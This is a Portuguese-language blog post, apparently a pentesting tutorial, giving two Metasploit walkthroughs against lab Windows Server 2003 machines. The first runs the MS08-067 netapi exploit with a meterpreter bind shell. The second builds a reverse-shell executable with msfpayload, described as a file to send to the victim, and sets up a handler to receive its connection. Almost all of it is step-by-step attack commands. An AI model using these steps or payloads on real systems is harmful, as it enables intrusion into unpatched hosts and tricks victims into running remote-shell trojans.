Mostrar mensagens com a etiqueta exploits. Mostrar todas as mensagens
Mostrar mensagens com a etiqueta exploits. Mostrar todas as mensagens

20/06/10

Exploit ms08_067_netapi + payload bind_tcp

MrTcp - Exploit ms08_067_netapi + payload bind_tcp

 

 

Ola desta vez vamos usar o exploit ms08_067_netapi  com a payload bind_tcp no meterpreter, mais informações sobre esta falha nos sistemas da Microsoft e como resolver pode ver neste link : MS08-067


PAYLOAD= windows/meterpreter/bind_tcp
EXPLOIT= exploit/smb/ms08_067_netapi

IP local= 192.168.1.4
IP remoto= 192.168.1.2

SO local = Backtrack4
SO remoto = Windows Server 2003 SP0

//Abrir o MetaSploit

# cd /pentest/exploit/framework3
#./msfconsole

//Escolher Exploit ms08_067_netapi

#use windows/smb/ms08_067_netapi

//Ver Opçoes

#show options

//Definir opçoes

#set RHOST 192.168.1.2

//Definir payload

#set payload windows/meterpreter/bind_tcp

//explorar a maquina

#exploit

//Se tudo correu bem ate aqui já estamos na maquina alvo, podemos executar o comando #help
 para ver todas as opções do framework disponíveis. Se quisermos abrir o DOS da maquina alvo e só digitar o comando #shell

Exploit handler+reverse_tcp


Exploit handler+reverse_tcp

 

Bem Vindos, nesta vídeo aula vamos utilizar o MetaSploit FrameWork3. Vamos usar o exploit handler e a payload shell_reverse_tcp, primeiro  vamos configurar e criar o nosso executável  com a payload shell_reverse_tcp, depois vamos configurar o exploit handler com a payload shell_reverse_tcp para ficar a escuta das ligações da vitima.


PAYLOAD= windows/shell_reverse_tcp
EXPLOIT= exploit/multi/handler

localhost= 192.168.1.4
remotehost= 192.168.1.2

SO local = Backtrack4
SO remoto = Windows server 2003 SP1



//Usar a payload shell_reverse_tcp;

#./msfpayload windows/shell_reverse_tcp O



//Configurar a payload com o host local e a porta;

#./msfpayload windows/shell_reverse_tcp LHOST=192.168.1.4 LPORT=333 O



//Criar arquivo executável, a enviar para a vitima;

#./msfpayload windows/shell_reverse_tcp LHOST=192.168.1.4 LPORT=333 X > /tmp/MrTcp.exe


//Verificar o Arquivo criado;

#file /tmp/MrTcp.exe


//Abrir o framework;

#./msfconsole

//Usar o exploit hander;

#use exploit/multi/handler

//Mostrar as opções do handler;

#show options

//Adicionar payload reverse_tcp ao exploit;

#set payload windows/shell/reverse_tcp

//Mostrar opções da payload;

#show options

//Definir o host local para ficar a espera de ligaçoes;

#set LHOST 192.168.1.4

//Definir a porta local para ficar a espera de ligações;

#set LPORT 333

//Executar exploit

#exploit